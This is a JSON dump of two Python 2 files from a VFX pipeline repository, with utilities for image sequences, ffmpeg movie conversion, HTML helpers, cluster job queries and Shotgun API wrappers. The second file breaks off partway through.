[ { "alpha_fraction": 0.5587757229804993, "alphanum_fraction": 0.5734493136405945, "avg_line_length": 28.77845001220703, "blob_id": "f9a668531f379050a7cbb75e4cb54ccb5736d460", "content_id": "67722d02d41876001495c27cfdb789c48794272c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24602, "license_type": "no_license", "max_line_length": 169, "num_lines": 826, "path": "/Common_Utility.py", "repo_name": "JimBae/ShotgunUtils", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#------------#\n# utility.py #\n#-------------------------------------------------------#\n# Jinhyuk #\t\n#-------------------------------------------------------#\n\n#========================\n# import library\n#========================\n\nimport sys, string, os, glob\nimport base64\nimport subprocess\nimport shutil\nfrom xml.etree import ElementTree as ET\n\n# for excel file\nfrom openpyxl.styles import Font, Color\nfrom openpyxl.styles import colors\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Border, Side, PatternFill, Font, GradientFill, Alignment\nfrom openpyxl.drawing.image import Image\n\n#========================\n# html & javascript\n#========================\n\ndef startHTML():\n \"\"\"!@brief Before start html code, call this function in cherrypy code.\n \"\"\"\n\n retStr = \"<!DOCTYPE html>\"\n retStr += \"<head>\"\n #retStr += \"<link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"/static/css/site.css\\\" >\"\n # CSS\n retStr += \"<style>\"\n retStr += \"body { background-color: #bfbfbf; }\"\n retStr += \"p { color: #2A6008; background-color: #DFF2BF; font-size: 18px; }\"\n retStr += \"p.DoneText { color: #2A6008; background-color: #DFF2BF; font-size: 18px; }\"\n retStr += \"p.WarningText{ color: #9F6000; background-color: #FEEFB3; font-size: 18px; }\"\n retStr += \"p.ErrorText { color: #D8000C; background-color: #FFBABA; font-size: 18px; }\"\n retStr += \"p.EndText { color: #003380; background-color: #99c2ff; font-size: 21px; }\"\n retStr += \"p.WarningBigText{ color: #9F6000; background-color: #FEEFB3; font-size: 22px; }\"\n retStr += \"p.TitleText{ color: #4d4d00; background-color: #99ff99; font-size: 22px; }\"\n retStr += \"p.DoneTextBig { color: #2A6008; background-color: #DFF2BF; font-size: 22px; }\"\n retStr += \"p.WarningTextBig{ color: #9F6000; background-color: #FEEFB3; font-size: 22px; }\"\n retStr += \"p.ErrorTextBig { color: #D8000C; background-color: #FFBABA; font-size: 22px; }\"\n retStr += \".loader { border: 8px solid #f3f3f3; border-top: 8px solid #3498db; border-radius: 50%; width: 30px; height: 30px; animation: spin 2s linear infinite; }\"\n retStr += \".loader2 { border: 8px solid #f3f3f3; border-top: 8px solid #3498db; border-radius: 50%; width: 30px; height: 30px; animation: spin 0s linear infinite; }\"\n retStr += \"@keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }\"\n # form for fxPostConfig\n \n\n retStr += \"</style>\"\n retStr += \"<script src=\\\"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js\\\"></script>\"\n retStr += \"</head>\"\n retStr += \"<body>\"\n return retStr\n\ndef endHTML():\n \"\"\"!@brief After finishing html code, call this function in cherrypy code.\n \"\"\"\n retStr = \"</body>\"\n retStr += \"</html>\"\n return retStr\n\ndef startJS():\n \"\"\"!@brief Before start javascript code, call this function in cherrypy code.\n \"\"\"\n return '''<script type=\\\"text/javascript\\\" language=\\\"javascript\\\">'''\n\ndef 
endJS():\n \"\"\"!@brief After finish javascript code, call this function in cherrypy code.\n \"\"\"\n return \"</script>\"\n\ndef progressBar():\n \"\"\"!@brief \n \"\"\"\n return '''<progress id=\\\"proBar\\\" value=\\\"0\\\" max=\\\"100\\\" style=\\\"width:300px;\\\"></progress>\n <span id=\\\"curr\\\"></span>\n <script type=\\\"text/javascript\\\" language=\\\"javascript\\\">\n function progressing(al) {\n var bar = document.getElementById('proBar');\n var status = document.getElementById('curr');\n status.innerHTML = al+\"%\";\n bar.value = al;\n\n if(al >= 100) {\n status.innerHTML = \"100%\";\n bar.value = 100;\n }\n }</script>'''\n\ndef progressBarValue( currentValue ):\n retStr = str( \"progressing(\" ) + str( currentValue ) + str(\");\")\n return retStr\n\n\n#============================\n# Sequence\n#============================\n\nclass seqObj():\n def __init__(self):\n self.nameOfSeq=''\n self.ext=''\n self.errors=list()\n self.startFrame=''\n self.endFrame=''\n self.pathToSeq=''\n self.padding=''\n self.passed=None\n \nclass seqContainer():\n def __init__(self):\n self.mySequences=list()\n\n#========================\n# Utility functions\n#========================\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\ndef makeShowSubDirectory( path ):\n\n chmodNumRoot = 02755 # drwxrwsr-x(2775), drwxr-xr-x(2755)\n chmodNumArtist = 02775 # drwxrwsr-x(2775), drwxr-xr-x(2755)\n uidNameFxServices = 1383 # root: 0, jinhyukb: 1369, fxservices: 1383\n gidNameArtist = 900 # artist\n gidNamePipe = 906 # pipe\n\n path = str(path)\n\n if not os.path.exists( path ):\n print \"Error@makeShowSubDirectory()::Failed to run mkdir(%s)\"%path\n return\n\n dirList = []\n try:\n dirList = getShowSubDir( path )\n except:\n print \"Error@makeShowSubDirectory()::Failed to run getShowSubDir()\"\n\n for subdir in dirList :\n if not os.path.exists( subdir ):\n try:\n os.mkdir( subdir, chmodNumArtist )\n except:\n print \"Error@makeShowSubDirectory()::Failed to run mkdir(%s)\"%subdir\n\n try:\n os.chown( subdir, uidNameFxServices, gidNameArtist )\n except:\n print \"Error@makeShowSubDirectory()::Failed to chown mkdir(%s)\"%subdir\n\n\ndef getMinMaxFrame( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n minFrame = 100000\n maxFrame = -100000\n\n for fName in files:\n fName_split = fName.split( dirName )[1]\n #print fName_split\n \n fNameWithoutExt= ''\n if \".dpx\" in fName_split:\n fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n elif \".exr\" in fName_split:\n fNameWithoutExt = fName_split.split( \".exr\" )[0]\n else:\n continue\n\n # max padding 6\n numOfPadding = 0\n for pIdx in range(-1, -7, -1):\n if not fNameWithoutExt[pIdx].isdigit():\n break\n numOfPadding += 1\n \n fileNameOnly = fNameWithoutExt[0:-(numOfPadding)]\n\n numStr = fNameWithoutExt.split( fileNameOnly )[1]\n\n if not numStr.isdigit():\n print \"Error@getMinMaxFrame(): numStr variables is not number %s\"%numStr\n\n currentFrame = int(numStr)\n\n if currentFrame < minFrame :\n minFrame = currentFrame\n\n if currentFrame > maxFrame :\n maxFrame = currentFrame\n\n return minFrame, maxFrame\n\ndef getExtension( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n for fName in files:\n fName_split = 
fName.split( dirName )[1]\n        #print fName_split\n        \n        fNameWithoutExt= ''\n        if \".dpx\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n            return \"dpx\"\n        elif \".exr\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".exr\" )[0]\n            return \"exr\"\n        else:\n            print \"Warning@getExtension: Extension does not match (dpx or exr).\"\n\ndef getPadding( dirName ):    \n\n    if dirName[-1] != \"/\":\n        dirName += \"/\"\n    dirList = os.listdir( dirName )\n\n    files = glob.glob( dirName + str(\"*.dpx\"))\n    files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n    for fName in files:\n        fName_split = fName.split( dirName )[1]\n        #print fName_split\n        \n        fNameWithoutExt= ''\n        if \".dpx\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n        elif \".exr\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".exr\" )[0]\n        else:\n            continue\n\n        # max padding 6\n        numOfPadding = 0\n        for pIdx in range(-1, -7, -1):\n            if not fNameWithoutExt[pIdx].isdigit():\n                break\n            numOfPadding += 1\n\n        return numOfPadding\n\ndef getFileNameOnlyList( dirName ):\n    if dirName[-1] != \"/\":\n        dirName += \"/\"\n    dirList = os.listdir( dirName )\n\n    files = glob.glob( dirName + str(\"*.dpx\"))\n    files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n    fileNameOnlyList = []\n    idxList = 0\n\n    for fName in files:\n        fName_split = fName.split( dirName )[1]\n        #print fName_split\n        \n        fNameWithoutExt= ''\n        if \".dpx\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n        elif \".exr\" in fName_split:\n            fNameWithoutExt = fName_split.split( \".exr\" )[0]\n        else:\n            continue\n\n        # max padding 6\n        numOfPadding = 0\n        for pIdx in range(-1, -7, -1):\n            if not fNameWithoutExt[pIdx].isdigit():\n                break\n            numOfPadding += 1\n        \n        fileNameOnly = fNameWithoutExt[0:-(numOfPadding)]\n\n        isExistingName = False\n\n        for fName in fileNameOnlyList:\n            if fileNameOnly == fName:\n                isExistingName = True\n                break\n\n        if not isExistingName:\n            fileNameOnlyList.append( fileNameOnly )\n\n    return fileNameOnlyList\n\n\ndef makeMov( dirName, fpsParam=24.0, outputPath='' ):\n\n    # check the folder exists\n    if not os.path.isdir( dirName ):\n        print \"Error@makeMov: %s does not exist.\"%dirName\n        return False\n    \n    # check files exist\n    files = glob.glob( dirName + str('/') + str(\"*.dpx\"))\n    files.extend( glob.glob( dirName + str('/') + str(\"*.exr\") ))\n    \n    if len(files) <= 0:\n        print \"Error@makeMov: There is no file in %s (dpx or exr).\"%dirName\n        return False\n\n    startFrame, endFrame = getMinMaxFrame( dirName )\n    fileNameOnly = getFileNameOnlyList( dirName )\n    \n    if( len(fileNameOnly) <= 0 ):\n        print \"Error@makeMov: There is no file in %s (dpx or exr).\"%dirName\n        return False\n\n    padding   = getPadding( dirName )\n    extension = getExtension( dirName )\n\n    filePathName = dirName + str(\"/\") + fileNameOnly[0] + str(\"%0\") + str(padding) + str(\"d.\") + str(extension)\n    fps          = fpsParam #24\n    codecFormat  = str('rgb48le')\n\n    if fileNameOnly[0][-1] == '.':\n        onlyFileName = fileNameOnly[0][0:-1]\n    else:\n        onlyFileName = fileNameOnly[0]\n\n    outFilePathName = ''\n    if outputPath:\n        outFilePathName = outputPath + str(\"/\") + onlyFileName + str(\".mov\")\n    else:\n        outFilePathName = dirName + str(\"/\") + onlyFileName + str(\".mov\")\n\n\n    cmd  = str('ffmpeg') + str(' ')\n    cmd += str('-y') + str(' ')\n    cmd += str('-start_number') + str(' ')\n    cmd += str( startFrame ) + str(' ')\n    cmd += str('-i') + str(' ')\n    cmd += str( filePathName ) + str(' ')\n    cmd += str(\"-c:v prores_ks -profile:v 4444 -vf format=\")\n    cmd += str( codecFormat ) + str(' ')\n    cmd 
+= str(\"-sws_flags lanczos+accurate_rnd\") + str(' ')\n cmd += str('-r') + str(' ')\n cmd += str( fps ) + str(' ')\n cmd += str( outFilePathName )\n\n process = subprocess.Popen( cmd, shell=True )\n process.wait()\n\n if process.poll() is None:\n pass\n else:\n print \"Done\"\n\n return True\n\n\ndef checkDirExisting( path ):\n\n if not os.path.exists( path ):\n print \"Error@checkDirExisting: %s not exist.\"%path\n return False\n\n dirList = []\n dirList = getShotSubDir( path )\n\n for subdir in dirList :\n if not os.path.exists( subdir ):\n print \"Error@checkDirExisting: %s not exist.\"%subdir\n return False\n\n return True\n\n\ndef getEnvList():\n envList = []\n for key in os.environ.keys():\n envList.append( str(\"%30s %s \\n\" % (key,os.environ[key])) )\n \n return envList\n\ndef getEnvUser():\n userName = ''\n for key in os.environ.keys():\n if key == \"USER\":\n userName = os.environ[key]\n\n return userName\n\ndef CheckProjectName( rootPath, projectName ):\n dirList = os.listdir( rootPath )\n existProjFolder = False\n\n for dirName in dirList:\n dirFullPath = rootPath + '/' + dirName\n if os.path.isdir(dirFullPath) and dirName == projectName :\n return True\n else:\n existProjFolder = False\n else:\n existProjFolder = False\n\n return existProjFolder\n\n\ndef ReadDirectory( dirPath ):\n files = list()\n if not os.path.isdir( dirPath ):\n print \"Warning@ReadDirectory(): Invalid dirPath : \", dirPath\n return files\n\n path = dirPath + \"/\"+\"*.dpx\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.jpg\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.png\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.tif\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.exr\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.tiff\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n return files\n\ndef ReadDirectoryWithExt( dirPath, extension ):\n files = list()\n if not os.path.isdir( dirPath ):\n print \"Warning@ReadDirectory(): Invalid dirPath : \", dirPath\n return files\n\n path = dirPath + \"/\" + \"*.\" + extension\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n return files\n\ndef CheckExstingImageSeq( pathToFrames ):\n hasSeqImages = False\n fileList = []\n # Case : dirOnly\n if os.path.isdir( pathToFrames ):\n fileList = ReadDirectory( pathToFrames )\n # Case : dir/fileName.ext\n else:\n dirName = os.path.dirname( pathToFrames )\n extName = pathToFrames.split('.')[-1]\n print \"dirName : \" + dirName \n print \"extension : \" + extName \n fileList = ReadDirectoryWithExt( dirName, extName )\n if len(fileList) > 0:\n hasSeqImages = True\n else:\n hasSeqImages = False\n return hasSeqImages\n\n\ndef GetNumOfFilesWithExtension( dirName, extName ):\n tmpFiles = glob.glob( dirName + \"/*.\" + extName )\n return len(tmpFiles)\n\ndef GetExtName( pathToFrames ):\n extName = \"*\"\n\n endName = pathToFrames.split(\".\")[-1]\n if endName == \"exr\": extName = \"exr\"\n elif endName == \"dpx\": extName = \"dpx\"\n elif endName == \"jpg\": extName = \"jpg\"\n elif endName == \"tif\": extName = \"tif\"\n elif endName == \"tiff\": extName = \"tiff\"\n elif endName == \"png\": extName = \"png\"\n else:\n dirNameOnly = pathToFrames\n if not os.path.isdir( pathToFrames ):\n 
dirNameOnly = os.path.dirname(pathToFrames)\n\n print \"dirNameOnly : \" + dirNameOnly\n maxNumOfFiles = 0\n numOfDpx = GetNumOfFilesWithExtension( dirNameOnly, \"dpx\" )\n if( numOfDpx > maxNumOfFiles ) : \n extName = \"dpx\"\n maxNumOfFiles = numOfDpx\n\n numOfExr = GetNumOfFilesWithExtension( dirNameOnly, \"exr\" )\n if( numOfExr > maxNumOfFiles ) : \n extName = \"exr\"\n maxNumOfFiles = numOfExr\n\n numOfJpg = GetNumOfFilesWithExtension( dirNameOnly, \"jpg\" )\n if( numOfJpg > maxNumOfFiles ) : \n extName = \"jpg\"\n maxNumOfFiles = numOfJpg\n\n numOfTif = GetNumOfFilesWithExtension( dirNameOnly, \"tif\" )\n if( numOfTif > maxNumOfFiles ) : \n extName = \"tif\"\n maxNumOfFiles = numOfTif\n\n numOfTiff = GetNumOfFilesWithExtension( dirNameOnly, \"tiff\" )\n if( numOfTiff > maxNumOfFiles ) : \n extName = \"tiff\"\n maxNumOfFiles = numOfTiff\n\n numOfPng = GetNumOfFilesWithExtension( dirNameOnly, \"png\" )\n if( numOfPng > maxNumOfFiles ) : \n extName = \"png\"\n maxNumOfFiles = numOfPng\n\n return extName\n\ndef GetUserName():\n cmd = \"who -q | egrep -v '# users'\"\n proc = subprocess.Popen(cmd, shell=True,stdout=subprocess.PIPE)\n\n if( proc!=None ):\n data = proc.communicate()[0]\n userNameList = data.split(\" \")\n if len(userNameList) > 0:\n return str(userNameList[0])\n else:\n print \"Error@GetUserName()-There is no name list.\"\n return None\n else:\n print \"Error@GetUserName()-Failed to run command.\"\n return None\n\ndef CreateDirectory( path ):\n \"\"\"!@brief Create directory.\n @param path The directory name to create.<br>\n @type (string)\n \"\"\"\n if( not os.path.isdir(path) ):\n try:\n os.makedirs(path)\n return True\n except OSError:\n print \"Error@CreateDirectory()-Failed to create directory : \" + path\n return False\n else:\n print \"Warning@CreateDirectory()-Alread exist directory : \" + path\n return True\n\ndef AddNewLineCharacter( inputStr ):\n maxCharacters = 35\n outStr = inputStr\n strSplit = inputStr.split(\" \")\n\n tmpStr = \"\"\n chrCount = 0\n for word in strSplit:\n chrCount += len(word)\n tmpStr += str(word)\n if chrCount > maxCharacters:\n tmpStr += str(\"\\n\")\n chrCount = 0\n else:\n tmpStr += str(\" \")\n\n if tmpStr:\n outStr = tmpStr\n return outStr\n\n\ndef GetFileList( dirPath, extName ):\n fileList = glob.glob( str(dirPath) + str(\"/*.\") + str(extName))\n return fileList\n\ndef GetFileList_v2( dirPath, extName, fileName ):\n fileList = glob.glob( str(dirPath) + str(\"/\") + str(fileName) + str(\"*.\") + str(extName))\n return fileList\n\ndef ConvertListToBase64List( listData ):\n base64List = []\n for ele in listData:\n base64List.append(base64.urlsafe_b64encode(str(ele)))\n return base64List \n\ndef ConvertListToStr( listData ):\n listStr = \"\"\n sizeOfList = len(listData)\n\n for i in range(sizeOfList):\n listStr += listData[i]\n if i != (sizeOfList-1):\n listStr += ','\n return listStr\n\ndef ConvertListToEncodedStr( listData ):\n listStr = \"\"\n sizeOfList = len(listData)\n\n for i in range(sizeOfList):\n listStr += base64.urlsafe_b64encode( str(listData[i]) )\n if i != (sizeOfList-1):\n listStr += ','\n return listStr\n\ndef ConvertEncodedStrToList( listStr ):\n listStrSplit = listStr.split(',')\n listData = []\n for ele in listStrSplit:\n listData.append( base64.urlsafe_b64decode(str(ele)))\n return listData\n\n\ndef ChangeName( pathToFrames, newFileStr, showName, shotName, versionName, debug=True ):\n \n # input\n fullPath = pathToFrames\n\n dirPath = os.path.dirname( fullPath )\n oriFileName = fullPath.split(dirPath)[-1]\n 
oriFileName = oriFileName[1:]\n extName = oriFileName.split('.')[-1]\n searchFileName = oriFileName.split('%')[0] + '*.' + extName\n\n if debug:\n print \"dirPath : \", dirPath\n print \"oriFileName : \", oriFileName\n print \"searchFileName : \", searchFileName\n\n searchFilePathName = dirPath + '/' + searchFileName\n fileList = glob.glob( searchFilePathName )\n \n newFileName = newFileStr\n newFileName = newFileName.replace(\"$(SHOW)\", showName )\n newFileName = newFileName.replace(\"$(SHOT)\", shotName )\n newFileName = newFileName.replace(\"$(VERSION)\", versionName)\n newFileName = newFileName.replace( \"//\", \"/\" )\n \n for i in range(len(fileList)):\n oriFilePath = fileList[i]\n oriFileNameOnly = oriFilePath.split('/')[-1].split('.')[0]\n oriFrameStr = oriFilePath.split('/')[-1].split('.')[1]\n oriExt = oriFilePath.split('/')[-1].split('.')[-1]\n #print oriFileNameOnly\n #print oriFrameStr\n #print oriExt\n \n newFileName = newFileName.replace( \"$(EXT)\", oriExt )\n newFileNameFinal = str(newFileName)%(int(oriFrameStr))\n newFilePathName = str(dirPath) + str('/') + str(newFileNameFinal)\n\n if debug:\n print \"before : \", oriFilePath\n print \"after : \", newFilePathName\n os.rename( oriFilePath, newFilePathName )\n\n # ex) BRB2400_dev_v001.%04d.exr\n oldNameSig = oriFileName\n newNameSig = newFileName\n\n return [oldNameSig, newNameSig]\n \n\ndef CheckExistImage( pathToFrames, debug=True ):\n # this version don't checking padding number\n\n # input\n fullPath = pathToFrames\n\n dirPath = os.path.dirname( fullPath )\n oriFileName = fullPath.split(dirPath)[-1]\n oriFileName = oriFileName[1:]\n extName = oriFileName.split('.')[-1]\n searchFileName = oriFileName.split('%')[0] + '*.' + extName\n fileNameOnly = oriFileName.split('%')[0]\n\n if debug:\n print \"dirPath : \", dirPath\n print \"oriFileName : \", oriFileName\n print \"searchFileName : \", searchFileName\n print \"extName : \", extName\n print \"fileNameOnly : \", fileNameOnly\n\n searchPath = dirPath + '/' + fileNameOnly + '*.' 
+ extName\n fileNameList = glob.glob( searchPath )\n if len(fileNameList) > 0:\n return True\n return False\n\ndef GetMissingFramesInfoFromSeq(sequence):\n isGood = True\n keys = sequence.keys()\n infoPrintList = []\n for i in range(len(keys)):\n frames=sequence[keys[i]]\n frames.sort()\n #print frames\n for j in range(len(frames)):\n if j>0:\n if j < (len(frames)-1):\n derivative=frames[j]-frames[j-1]\n if(derivative>1):\n isGood = False\n missingStr = \"[ \"+ keys[i]+ \" ] missing frames [\"+str(frames[j-1]+1)+\" -> \"+str(frames[j]-1)+\"]\"\n print missingStr\n infoPrintList.append( missingStr )\n\n lengthStr = \"[ \"+keys[i]+\" ] length [ \"+str(len(frames))+\" ]\"\n print lengthStr\n infoPrintList.append( lengthStr )\n return infoPrintList, isGood\n\ndef GetMissingFramesInfo( dirPath ):\n files = os.listdir( dirPath )\n files.sort()\n sequences = dict()\n for i in range(len(files)):\n fileName = string.split(files[i],\".\")\n if(len(fileName)==3):\n if not (sequences.has_key(fileName[0])):\n listing = list()\n try:\n listing.append(string.atoi(fileName[1]))\n sequences[fileName[0]]=list()\n except:\n break\n\n if (sequences.has_key(fileName[0])):\n try:\n sequences[fileName[0]].append(string.atoi(fileName[1]))\n except:\n break\n #print sequences\n missingFrameStrList, isGood = GetMissingFramesInfoFromSeq(sequences)\n return missingFrameStrList, isGood\n\ndef GetFrameRangeInfo( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n files.extend( glob.glob( dirName + str(\"*.jpg\") ))\n files.extend( glob.glob( dirName + str(\"*.png\") ))\n files.extend( glob.glob( dirName + str(\"*.tif\") ))\n files.extend( glob.glob( dirName + str(\"*.tiff\") ))\n files.sort()\n\n minFrame = 10000000\n maxFrame = -10000000\n\n for fName in files:\n fileFullName = fName.split( dirName )[1]\n #extName = fileFullName.split('.')[-1]\n numStr = fileFullName.split('.')[-2]\n #print numStr\n currentFrame = int(numStr)\n\n if currentFrame < minFrame :\n minFrame = currentFrame\n\n if currentFrame > maxFrame :\n maxFrame = currentFrame\n\n return [minFrame, maxFrame]\n\n\ndef Job_GetJobXml( onDebug=False ):\n p3 = subprocess.Popen([\"qstat\", \"-u\", \"*\", \"-xml\"], stdout=subprocess.PIPE)\n dataStr = ''\n if (p3 != None):\n dataStr = p3.communicate()[0]\n if onDebug : print dataStr\n return dataStr\n\ndef Job_GetOngoingJobNameList( xmlStr, onDebug ):\n\n root = ET.fromstring( xmlStr )\n\n jobNameList = []\n for jobList in root.findall('job_info/job_list'):\n jobName = jobList.find('JB_name').text\n jobNameList.append(jobName)\n if onDebug: print jobName\n\n return jobNameList\n\ndef Job_CheckingExistingJob( jobNameList, myJobName ):\n isExist = False\n\n if len(jobNameList) == 0:\n return False\n\n for job in jobNameList:\n if job.find( myJobName ) != -1:\n isExist = True\n return True\n\n return isExist\n\n\n\n\n\n" }, { "alpha_fraction": 0.5213838815689087, "alphanum_fraction": 0.5233832001686096, "avg_line_length": 33.5405387878418, "blob_id": "17e8bbfacb2335e00de2660ea709d5c73c2cec93", "content_id": "201728d5716f12d95c11b001f6d8c812e5091d16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11504, "license_type": "no_license", "max_line_length": 181, "num_lines": 333, "path": "/Shotgun_Utilities.py", "repo_name": "JimBae/ShotgunUtils", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/python\n\n#-----------------------#\n# Shotgun_Utilities.py #\n#-----------------------#\n\nimport sys, string, os\nimport glob\nimport json\nimport subprocess\nimport array\nimport base64\nimport time\nimport datetime\nfrom datetime import date\nimport pickle\nimport string\nimport math\n\nimport OpenImageIO as oiio\nimport PyOpenColorIO as ocio\n\nfrom shotgun_api3.shotgun import Shotgun\n\n#=======================\n# Get shotgun\n#=======================\ndef SetShotgun():\n SERVER_PATH = ''\n SCRIPT_USER = ''\n SCRIPT_KEY = ''\n sg = Shotgun(SERVER_PATH,SCRIPT_USER, SCRIPT_KEY)\n return sg\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Project \n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# find a project given the name\n#------------------------------\ndef GetProject( sg, inputName ):\n return sg.find_one( \"Project\", [[\"name\", \"is\", inputName]], ['name'])\n\n#------------------------------\n# find project list\n#------------------------------\n#def GetProjectList( sg ):\n# return sg.find( \"Project\", [[\"name\", \"is\", \"\\*\"]] )\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Shot\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# find shot list given project\n#------------------------------\ndef GetShotList( sg, sgProject ):\n return sg.find( \"Shot\", [[\"project\", \"is\", sgProject]], ['code'] )\n\n#------------------------------\n# find shot info given a shot\n#------------------------------\ndef GetShotInfo( sg, sgProject, shotId ):\n return sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'sg_sequence', 'sg_status_list', \\\n 'sg_cut_in','sg_cut_out', 'sg_cut_duration',\\\n 'sg_working_duration', 'tag_list', 'sg_plates_received',\\\n 'sg_shot_description', 'description',\\\n 'sg_latest_client_note', 'sg_latest_note',\\\n 'sg_date_due', 'image'\n ] )\n\n#------------------------------\n# find shot info given a shot\n#------------------------------\ndef GetShotInfoThumbnail( sg, sgProject, shotId ):\n return sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'image'] )\n\n\n#------------------------------\n# Update shot info of Shotgun\n#------------------------------\ndef UpdateShotInfo( sg, shotId, sgData ):\n print \"---------------------------\"\n print \"sg : \"\n print sg\n print \"shotId : \"\n print shotId\n print \"sgData : \"\n print sgData\n print \"---------------------------\"\n try:\n sg.update( 'Shot', int(shotId), sgData )\n print \"Done@UpdateShotInfo()-Success to update Shotgun\"\n return True\n except:\n print \"Error@UpdateShotInfo()-Failed to update Shotgun\"\n return False\n\n return True\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Version\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# look for versions in a shot:\n#------------------------------\ndef GetVersion(sg, shotID):\n return sg.find('Version',[['entity','is',shotID]],['code','task','sg_path_to_frames'] )\n\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Note\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\ndef GetLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', 
{'type':'Shot', 'id':shotId} ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\ndef GetClientLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', {'type':'Shot', 'id':shotId} ],\n [ 'sg_note_type', 'is', 'Client' ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\ndef GetInternalLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', {'type':'Shot', 'id':shotId} ],\n [ 'sg_note_type', 'is_not', 'Client' ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Thumbnail\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\ndef GetThumbnail(sg, shotId, filePath ):\n urlImage = 'https://my.shotgunstudio.com/thumbnail/Shot/' + str(shotId)\n try:\n outImage = sg.download_attachment({'url': urlImage}, filePath)\n return True\n except:\n return False\n\ndef GetThumbnail_v2(sg, sgProject, shotId, filePath ):\n\n entry = sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'image'] )\n # Get image\n if(entry['image']):\n if(entry['image'] != None ):\n imageUrl = str(entry['image'])\n outImage = sg.download_attachment({'url': imageUrl}, filePath )\n return True\n else:\n print \"Error@GetThumbnail_v2.py::Failed to load thumbnail image.\"\n return False\n else:\n print \"Error@GEtThumbnail_v2.py::There is no thumbnail image attribute.\"\n return False\n\n#==================================\n# related with shotgun api\n#==================================\n#\n#def shotgunConnect( path, user, key ):\n# from shotgun_api3.shotgun import Shotgun\n# sg = Shotgun( path, user, key )\n# return sg\n#\n## find a project given the name\n#def sgProject( sg, inputName ):\n# return sg.find_one( \"Project\", [[\"name\", \"is\", inputName]]\n#\n#\n## find a shot given the name\n#def sgShot( sg, shot, project ):\n# return sg.find_one( 'Shot', [['code','is',shot],['project','is',project]],['sg_cut_in','sg_cut_out','sg_client_version','code'])\n#\n## expects a project in the proper naming, and a shot\n#def createShot( sg, proj, shot ):\n# filters = [['code','is','CGI']]\n# template = sg.find_one('TaskTemplate', filters)\n# project = sgProject(proj)\n#\n# data = { 'project': 